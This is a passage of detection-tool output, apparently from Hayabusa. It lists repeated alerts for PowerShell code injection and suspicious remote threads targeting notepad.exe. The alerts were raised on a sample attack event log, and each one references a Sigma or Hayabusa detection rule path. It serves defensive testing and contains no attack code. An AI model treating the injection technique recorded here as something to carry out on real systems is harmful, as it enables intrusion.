+09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.380 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.395 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.395 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.395 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.411 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.411 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.411 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.426 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.426 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.426 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.458 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.458 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.458 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.473 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.473 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.473 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.489 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.489 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.489 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.505 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.505 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.505 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.520 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.520 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.520 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.536 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.536 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.536 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.551 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.551 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.551 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.567 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.567 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.567 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.583 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.583 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.583 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.598 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.598 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.598 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.614 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.614 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.614 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.630 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.630 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.630 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.661 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.661 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.661 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.692 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.692 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.692 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.708 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.708 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.708 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.723 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.723 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.723 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.739 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.739 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.739 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.755 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.755 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.755 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.770 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.770 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.770 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.801 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.801 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.801 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread 